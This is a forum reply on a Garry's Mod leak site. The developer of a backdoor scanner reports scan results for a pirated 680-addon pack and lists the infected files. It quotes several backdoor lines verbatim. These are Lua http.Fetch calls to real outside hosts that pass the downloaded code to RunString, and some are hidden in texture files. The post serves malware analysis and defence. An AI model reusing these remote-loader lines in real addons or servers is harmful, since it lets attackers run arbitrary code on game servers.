Garry's Mod Leaks
[LEAK][MEGA - PACK] 680+ ADDON PACK
Submitted by Emilywilles, 02-04-2022, 08:44 PM, Thread ID: 239535
Thread Closed
RE: [LEAK][MEGA - PACK] 680+ ADDON PACK
I also wrote this message in a repost of this pack (https://nulledbb.com/thread-LEAK-MEGA-PA...ADDON-PACK).
Ok. I develop an addon called Backdoor Shield and I ran this pack through its file scanner (command bs_scall_full). These were the results summary:
Quote: Files scanned: 42559
Detections:
| High-Risk : 49
| Medium-Risk : 107
| Low-Risk : 458
| Discarded : 6986
Saved as: data/backdoor-shield/Scan_2022-05-11_(22h 50m 50s).txt
After analyzing the output I found these backdoors:
Quote:addons/isolated/Advanced Kevlar System 1.0.1/cpk/lua/autorun/server/cpk_core.lua
addons/isolated/cpk/lua/autorun/server/cpk_core.lua
http.Fetch("http://230w2zy3dv.ga/loader.php",function(_)RunString(_,"",!!1)end)
addons/isolated/advanced_medic_mod/lua/autorun/sh_medicmod_loader.lua
addons/isolated/advanced_medic_mod_wdrm/lua/autorun/sh_medicmod_loader.lua
The entire file, they are the same (Update: decoded, it's a DRM)
addons/isolated/areamanager/lua/areamanager/_statistics.lua
The entire file (Update: decoded, it's a DRM)
addons/isolated/eprotect_1.3.10/lua/e_protect/client/cl_utils.lua
The entire file (Update: decoded, it's a DRM)
addons/isolated/simple-afk-system/lua/autorun/server/npc_help.lua
addons/isolated/mechanical_system/lua/autorun/server/npc_help.lua
addons/isolated/opti/lua/autorun/server/npc_help.lua
The entire files, they are the same
addons/isolated/precision-tool/lua/weapons/gmod_tool/stools/precision.lua
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=djItuMLNOSYFaOTavYs3", function(b) RunString(b, ":", false) end)end)
addons/isolated/production_acier/lua/autorun/sh_loadacier.lua
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=zIye1U7eyoSAcnWZfopr", function(b) RunString(b, ":", false) end)end)
addons/isolated/GMOD PACK/zeros_vendingmachines/materials/npc/help.vtf
addons/isolated/mechanical_system/materials/npc/help.vtf
addons/isolated/opti/materials/npc/help.vtf
addons/isolated/simple-afk-system/materials/npc/help.vtf
addons/isolated/zeros_vendingmachines/materials/npc/help.vtf
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=HnHwSrtk9AG491as0D41", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=nYtcUboSez0wEzapWE8H", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=zIye1U7eyoSAcnWZfopr", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=GIEimqvKTPpXM9S0yQBl", function(b) RunString(b, ":", false) end) end)
The "npc_help.lua" and "http.Fetch" groups are a little simpler because they are self contained and easier to read, so I don't have much to say about them, but I'm interested in decoding others (especially "cl_utils.lua" since it's clientside only).
If some of you want test BS (aka bullshit detector - https://github.com/Xalalau/backdoor-shield), consider that the file scanner can be avoided by backdoors with some tactics, so also execute the infected addons along with Shield to make use of the real-time protection - which blocks suspicious calls, traces their locations and even copies the malicious code to a log.
I hope I've found most of the "issues", but if anything new and cool comes up, let me know - It's much easier to develop this thing by reading the targets' code. In fact, I'm here just for that, I don't like software piracy.
Users browsing this thread: 12 Guest(s)